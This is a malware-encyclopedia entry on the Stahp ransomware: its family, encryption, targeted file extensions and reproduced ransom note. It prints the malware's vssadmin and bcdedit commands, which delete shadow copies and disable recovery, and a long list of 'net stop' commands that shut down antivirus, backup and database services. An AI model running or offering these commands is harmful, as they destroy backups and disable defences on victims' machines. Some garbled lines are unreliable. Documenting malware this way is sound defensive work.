malwarewikiaorg-20200223-history
Stahp
Stahp or Mike is a ransomware that runs on Microsoft Windows. Despite it's name, it is not part of the STOP/Djvu family and is part of the HildaCrypt family. It is not part of the STOP/Djvu family because the format of the encrypted file is different from STOP-Djvu. There is no file token or identifier at the end of the file. Instead, the title says "0200" and the original file size. The ID in the note seems to be unchanged for each run. No connections to the command and control server. Someone on behalf of the developer or the developer himself later said that he does encryption for his pleasure and does not try to encrypt files for ransom. A strange pleasure, apparently, as the developer himself. The developer did not spread the ransomware to extort a ransom. Payload It deletes the shadow copies of files on the drives, disables the Windows recovery and repair functions at the boot stage using the following commands: vssadmin resize shadowstorage / for = c: / on = c: / maxsize = 401MB vssadmin resize shadowstorage / for = c: / on = c : / maxsize = unbounded vssadmin resize shadowstorage / for = d: / on = d: / maxsize = 401MB vssadmin resize shadowstorage / for = d: / on = d: / maxsize = unbounded vssadmin resize shadowstorage / for = e: / on = e: / maxsize = 401MB vssadmin resize shadowstorage / for = e: / on = e: / maxsize = unbounded vssadmin resize shadowstorage / for = f: / on = f: / maxsize = 401MB vssadmin resize shadowstorage / for = f: / on = f: / maxsize = unbounded vssadmin resize shadowstorage / for = g: / on = g: / maxsize = 401MB vssadmin resize shadowstorage / for = g: / on = g: / maxsize = unbounded vssadmin resize shadowstorage / for = h: / on = h: / maxsize = 401MB vssadmin resize shadowstorage / for = h: / on = h: / maxsize = unbounded bcdedit / set {default} recoveryenabled No bcdedit / set {default} bootstatuspolicy ignoreallfailures vssadmin Delete Shadows / all / quiet Before encryption, it stops the Windows system services with the following commands: net stop SQLAgent $ SYSTEM_BGC / y net stop “Sophos Device Control Service” / y net stop macmnsvc / y net stop SQLAgent $ ECWDB2 / y net stop “Zoolz 2 Service” / y net stop McTaskManager / y net stop “Sophos AutoUpdate Service” / y net stop “Sophos System Protection Service” / y net stop EraserSvc11710 / y net stop PDVFSService / y net stop SQLAgent $ PROFXENGAGEMENT / y net stop SAVService / y net stop MSSQLFDLauncher $ TPSAMA / y net stop EPSecurityService / y net stop SQLAgent $ SOPHOS / y net stop “Symantec System Recovery” / y net stop Antivirus / y net stop SstpSvc / y net stop MSOLAP $ SQL_2008 / y net stop TrueKeyServiceHelper / y net stop sacsvr / y net stop VeeamNFSSvc / y net stop FA_Scheduler / y net stop SAVAdminService / y net stop EPUpdateService / y net stop VeeamTransportSvc / y net stop “Sophos Health Service” / y net stop bedbg / y net stop MSSQLSERVER / y net stop KAVFS / y net stop Smcinst / y net stop MSSQLServerADHelper100 / y net stop TmCCSF / y net stop wbengine / y net stop SQLWriter / y net stop MSSQLFDLauncher $ TPS / y net stop SmcService / y net stop ReportServer $ TPSAMA / y net stop swi_update / y net stop AcrSch2Svc / y net stop MSSQL $ SYSTEM_BGC / y net stop VeeamBrokerSvc / y net stop MSSQLFDLauncher $ PROFXENGAGEMENT / y net stop VeeamDeploymentService / y net stop SQLAgent $ TPS / y net stop DCAgent / y net stop “Sophos Message Router” / y net stop MSSQLFDLauncher $ SBSMONITORING / y net stop wbengine / y net stop MySQL80 net stop MSOLAP $ SYSTEM_BGC / y net stop ReportServer $ TPS / y net stop MSSQL $ ECWDB2 / y net stop SntpService / y net stop SQLSERVERAGENT / y net stop BackupExecManagementService / y net stop SMTPSvc / y net stop mfefire / y net stop BackupExecRPCSer y net stop MSSQL $ VEEAMSQL2008R2 / y net stop klnagent / y net stop MSExchangeSA / y net stop MSSQLServerADHelper / y net stop SQLTELEMETRY / y net stop “Sophos Clean Service” / y net stop swi_update_64 / y net stop “Sophos Web Control Service” / y net stop EhttpSrv / y net stop POP3Svc / y net stop MSOLAP $ TPSAMA / y net stop McAfeeEngineService / y net stop “Veeam Backup Catalog Data Service” / y net stop MSSQL $ SBSMONITORING / y net stop ReportServer $ SYSTEM_BGC / y net stop AcronisAgent / y net stop KAVFSGT / y net stop BackupExecDeviceMediaService / y net stop MySQL57 / y net stop McAfeeFrameworkMcAfaF y net stop TrueKey / y net stop VeeamMountSvc / y net stop MsDtsServer110 / y net stop SQLAgent $ BKUPEXEC / y net stop UI0Detect / y net stop ReportServer / y net stop SQLTELEMETRY $ ECWDB2 / y net stop MSSQLFDLauncher $ SYSTEM_BGC / y net stop MSSQL $ BKUPEXEC / y net stop SQLAgent $ PRACTTICEBGC / y net stop MSExchangeSRS / y net stop SQLAgent $ 2 net stop McShield / y net stop SepMasterService / y net stop “Sophos MCS Client” / y net stop VeeamCatalogSvc / y net stop SQLAgent $ SHAREPOINT / y net stop NetMsmqActivator / y net stop kavfsslp / y net stop tmlisten / y net stop ShMonitor / y net stop MsDtsServer / y net stop SQLAgent $ SQL_2008 / y net stop SDRSVC / y net stop IISAdmin / y net the stop the SQLAgent $ PRACTTICEMGT / y net the stop BackupExecJobEngine / y net the stop the SQLAgent $ VEEAMSQL2008R2 / y net the stop BackupExecAgentBrowser / y net the stop VeeamHvIntegrationSvc / y net the stop masvc / y net the stop w3svc / y net the stop "SQLsafe Backup the Service" / y net the stop SQLAgent $ CXDB / y net stop SQLBrowser / y net stop MSSQLFDLauncher $ SQL_2008 / y net stop VeeamBackupSvc / y net stop “Sophos Safestore Service” / y net stop svcGenericHost / y net stop ntrtscan / y net stop SQLAgent $ VEEAMSQL2012 / y net stop MSExchangeMGMT / y net stop SamSs / y net stop MSExchangeES / y net stop MBAMService / y net stop EsgShKernel / y net stop ESHASRV / y net stop MSSQL $ TPSAMA / y net stop SQLAgent $ CITRIX_METAFRAME / y net stop VeeamCloudSvc / y net stop “Sophos File Scanner Service” / y net stop “Sophos Agent” / y net stop MBEndpointAgent / y net stop swi_service / y net stop MSSQL $ PRACTICEMGT / y net stop SQLAgent $ TPSAMA / y net stop McAfeeFramework / y net stop “Enterprise Client Service” / y net stop SQLAgent $ SBSMONITORING / y net stop MSSQL $ VEEAMSQL2012 / y net stop swi_filter / y net stop SQLSafeOLRService / y net stop BackupExecVSSProvider / y net stop VeeamEnterpriseManagerSvc / y net stop SQLAgent $ SQLEXPRESS / y net stop OracleClientCache80 / y net stop MSSQL $ PROFXENGAGEMENT / y net stop IMAP4Svc / y net stop ARSM / y net stop MSExchangeIS / y net stop AVP / y net stop MSSQLFDLauncher / y net stop MSExchangeMTA / y net stop TrueKeyScheduler / y net stop MSSQL $ SOPHOS / y net stop “SQL Backups” / y net stop MSSQL $ TPS / y net stop mfemms / y net stop MSDtsServer100 / y net stop MSSQL $ SHAREPOINT / y net stop WRSVC / y net stop mfevtp / y net stop msftesql $ PROD / y net stop mozyprobackup / y net stop MSSQL $ SQL_2008 / y net stop SNAC / y net stop ReportServer $ SQL_2008 / y net stop BackupExecAgentAccelerator / y net stop MSSQL $ SQLEXPRESS / y net stop MSSQL $ PRACTTICEBGC / y net stop VeeamRESTSvc / y net stop sophossps / y net stop ekrn / y net stop MMS / y net stop “Sophos MCS Agent” / y net stop RESvc / y net stop “Acronis VSS Provider” / y net stop MSSQL $ VEEAMSQL2008R2 / y net stop MSSQLFDLauncher $ SHAREPOINT / y net stop “SQLsafe Filter Service” / y net stop MSSQL $ PROD / y net stop SQLAgent $ PROD / y net stop MSOLAP $ TPS / y net stop VeeamDeploySvc / y net stop MSSQLServerOLAPService / y Stahp then encrypts the user's data using AES + RSA. It appends the .mike extension. Stahp encrypts the following extensions: .3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .7z, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads .agdl, .ai, .ait, .al, .apj, .arw, .asf, .asm, .asmx, .asp, .aspx, .asx, .avi, .awg, .back, .backup,. backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkf, .bkp, .blend, .bpw, .c, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .config, .cpi, .cpp, .cr2, .craw .crt, .crw, .cs, .csh, .csl, .csproj, .csv, .dac, .db, .db3, .dbf, .db-journal, .dbx, .dc2, .dcr, .dcs .ddd .ddoc .ddrw .dds .der .des .design .dgc .djvu .dng .doc .docm .docxdot .dotm .dotx drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fh, .fhd, .fla, .flac, .flv, .fmb, .fpx, .fxg, .gray, .grey, .gry, .h, .hbk, .hpp, .htm, .html, .ibank, .ibd, .ibz .idx,.iif, .iiq, .incpas, .indd, .jar, .java, .jpe, .jpeg, .jpg, .jsp, .kbx, .kc2, .kdbx, .kdc, .key, .kpdx, .lnk, .lua, .m, .m4v, .manifest, .max, .md, .mdb, .mdb, .mdc, .mdf, .mef, .mfw, .mmw, .moneywell, .mos, .mov, .mp3 .mp4, .mpeg, .mpg, .mrw, .msg, .myd, .nd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nxl, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pbl, .pbl .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .php5, .phtml, .pl, .plc, .png, .pot, .potm, potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .ps, .psafe3, .psd, .pspimage, .pst, .ptx, .py, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rm, .rtf, .rw2, .rwl, .rwz .s3db, .sas7bdat, .say,.sd0, .sda, .sdf, .sldm, .sldx, .sln, .sql, .sqlite, .sqlite3, .sqlitedb, .sr2, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm .tib, .tif, .tlg, .txt, .vb, .vbproj, .vob, .wallet, .war, .wav, .wb2, .wmv, .wpd, .wps, .x11, .x3f,. xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .ycbcra, .yuv, .zip It drops a text file called _readme.txt. The text file saids the following: ATTENTION! Don’t worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees do you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-UV4s8jgncB Price of private key and decrypt software is $ 980. Discount 50% available if you contact us first 72 hours, that's price for you is $ 490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don’t get answer more than 6 hours. The get the this software the To Up Need you on the write an e-mail Our: gorentos@bitmessage.ch Reserve an e-mail address to contact us: gerentoshelp@firemail.cc Your personal ID: PtvJag4t9UH4xQK3hJ6uNwm2pRiSeFwPEyjpisZ2BExzgUpmmuJrVXNQ Category:Assembly Category:Win32 ransomware Category:Ransomware Category:Win32 trojan Category:Win32 Category:Microsoft Windows Category:Trojan